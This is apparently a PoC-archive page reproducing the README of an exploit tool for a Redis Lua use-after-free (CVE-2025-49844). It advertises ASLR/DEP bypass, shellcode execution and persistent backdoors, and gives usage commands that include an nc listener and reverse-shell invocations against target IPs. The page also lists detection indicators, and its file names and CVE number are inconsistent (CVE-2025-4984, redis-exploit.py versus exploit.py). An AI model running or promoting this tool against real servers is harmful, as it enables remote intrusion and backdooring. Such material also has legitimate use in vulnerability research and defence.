关联漏洞
标题:Redis 资源管理错误漏洞 (CVE-2025-49844)Description:Redis是美国Redis公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。 Redis 8.2.1及之前版本存在资源管理错误漏洞,该漏洞源于特制Lua脚本可操纵垃圾收集器,触发释放后重用,可能导致远程代码执行。
Description
A powerful Redis exploitation tool that leverages CVE-2025-4984
介绍
# CVE-2025-49844 - Redis Lua Interpreter UAF Exploit
## Features
- Exploit Use-After-Free (UAF) vulnerability in Redis Lua interpreter
- Bypass ASLR via memory information leakage
- Bypass DEP/NX using Return-Oriented Programming (ROP)
- Heap spraying for reliable exploitation
- Execute arbitrary shellcode on target systems
- Establish persistent backdoor access
- Multi-stage exploitation with memory manipulation
## Requirements
- Python 3.6+
- Redis server with vulnerable version
- Required Python packages:
```
pip install redis
```
## Installation
```
git clone https://github.com/Yuri08loveElaina/CVE-2025-49844.git
cd CVE-2025-49844
pip install -r requirements.txt
chmod +x redis-exploit.py
```
- Usage
Basic Vulnerability Check
```
python3 exploit.py -H <target_host> -p <port> [-a <password>]
```
Reverse Shell Establishment
# First, start a listener on your machine
```
nc -lvnp 4444
```
# Then, run the exploit with reverse shell parameters
```
python3 exploit.py -H <target_host> -p <port> [-a <password>] -l <your_ip> -P <your_port>
Options
-H, --host: Target Redis host (default: localhost)
-p, --port: Target Redis port (default: 6379)
-a, --auth: Redis password (if required)
-l, --lhost: Your IP address for reverse shell connection
-P, --lport: Your port for reverse shell connection (default: 4444)
```
Examples
# Basic exploitation
```
python3 exploit.py -H 192.168.1.100
```
# With authentication
```
python3 exploit.py -H 192.168.1.100 -p 6380 -a mypassword
```
# With reverse shell
```
python3 exploit.py -H 192.168.1.100 -l 10.10.15.5 -P 4444
```
# Exploit Stages
- Connection & Version Check: Establish connection to target and verify vulnerability
- Architecture Detection: Determine target architecture (x86/x64)
- Heap Preparation: Spray heap to increase exploit reliability
- UAF Object Creation: Create objects for Use-After-Free exploitation
- Memory Leakage: Leak memory addresses to bypass ASLR
- ROP Chain Construction: Build ROP chain to bypass DEP/NX
- Shellcode Execution: Execute arbitrary shellcode on target
- Persistence: Establish persistent backdoor if requested
## Vulnerable Versions
Redis 7.2.x before 7.2.11
Redis 7.4.x before 7.4.6
Redis 8.0.x before 8.0.4
Redis 8.2.x before 8.2.2
## Detection
The exploit attempts to minimize detection, but possible indicators include:
- Unusual Lua script execution patterns with large payloads
- Anomalous memory allocation behavior in Redis process
- Unexpected process creation from Redis parent process
- Network connections from Redis process to external hosts
Disclaimer
This tool is for educational and authorized security testing purposes only. The authors are not responsible for any misuse or damage caused by this tool. Use only on systems you own or have explicit permission to test.
License
This project is licensed under the MIT License - see the LICENSE file for details.
文件快照
[4.0K] /data/pocs/6d832ca12e1051bcdf34a0c1142b03b078935b85
├── [1.0K] LICENSE
├── [3.0K] README.md
├── [ 11K] redis_exploit.py
└── [ 29] requirements.txt
1 directory, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。